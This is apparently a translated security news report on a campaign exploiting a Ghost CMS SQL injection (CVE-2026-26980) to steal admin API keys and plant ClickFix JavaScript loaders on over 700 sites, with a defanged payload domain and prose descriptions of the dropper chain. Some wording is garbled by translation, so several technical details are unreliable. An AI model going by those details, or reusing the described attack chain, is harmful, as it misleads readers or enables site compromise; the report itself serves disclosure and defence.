Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attack
Threat actors are exploiting a recently disclosed critical flaw in Ghost CMS to inject malicious JavaScript code with the intent of igniting a ClickFix attack.
According to QiAnXin XLab, the work involves exploiting CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost’s Content API that could allow an unauthorized attacker to read arbitrary data from a database. The security bug was addressed in February 2026 in version 6.19.1. The vulnerability was discovered by Anthropic using Claude.
What makes the vulnerability more robust is that it allows an attacker to gain access to a site administrator’s API key without permission, giving him the ability to poison the site by injecting malicious code. The admin API key can be used to request the admin API and can directly modify articles published in the content management system.
A threat actor leveraged a security flaw to “obtain the target site’s Admin API key without authorization, then use the Ghost Admin API to tamper with articles in bulk, injecting malicious JavaScript loaders at the bottom of pages to facilitate CAPTCHA spoofing attacks,” XLab said.
The operation has been described by a Chinese security vendor as a “massive poisoning” campaign that exploits the Ghost CMS flaw. At least two different sets of threats were tested to be behind the campaign, in some cases infecting specific sites with malicious code within a single day. First accessed on May 7, 2026.
In total, the campaign compromised more than 700 websites, including universities, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media and financial technology sectors. The fact that legitimate websites are compromised may increase the success rate of ClickFix attacks, XLab said.
The JavaScript code injected at the bottom of the article acts as a two-stage loader responsible for retrieving the main payload at runtime from an external domain (“clo4shara[.]xyz/11z77u3.php”). This feature provides more flexibility as it enables a threat actor to swap payloads based on different criteria, while keeping the payload’s performance constant across several vulnerable sites.
“It directly accesses clo4shara[.]”xyz/11z77u3.php exposes a piece of code, which is a common traffic distribution script,” explained XLab. “Its main function is to collect various fingerprint information from the user’s browser and upload it to the server, then perform actions such as redirects, hijacks, and downloads based on the returned commands.” The PHP script is powered by the cloaking service, Adspective.
The idea of using a cloaking script is to ensure that only real victims are served the real payload, while security scanners and browsers will only see the correct web page. The script also supports 19 different commands to execute arbitrary JavaScript code and facilitate remote control of the victim’s browser.
Site visitors who are considered the target audience are ultimately presented with a fake CAPTCHA verification page within an HTML iframe element to prove they are human. This, in turn, triggers the ClickFix attack, as part of which they are instructed to copy and paste a Base64-encoded command into the Windows Run dialog.
The command works like a dropper to deliver a ZIP archive and extract the Windows cluster script from it and run it. The script, on the other hand, issues a PowerShell command to download a DLL file from a remote domain, launch it using “rundll32.exe,” and open a fake web page to the user as a distraction.
The next iteration of the malware was found to replace the DLL with a JavaScript payload. Regardless of the type of payload, the ultimate goal of the attack is to crash the Windows executable. In the case of a DLL, the executable is a PuTTY client with a valid code-signing certificate. The binary distributed with JavaScript is the Inno Setup installer for the Electron application.
The application is a modified version of the open source Grape desktop client designed to achieve persistence and remote server polling (“web-telegram[.]ug”) every 30 seconds to process commands issued by the attacker, including executing JavaScript code or executable files.
Ghost CMS users are advised to upgrade their instances to the latest version, change all information, clean sites, check access logs for signs of suspicious activity, and notify users who may be visiting sites during dirty times to take risks.
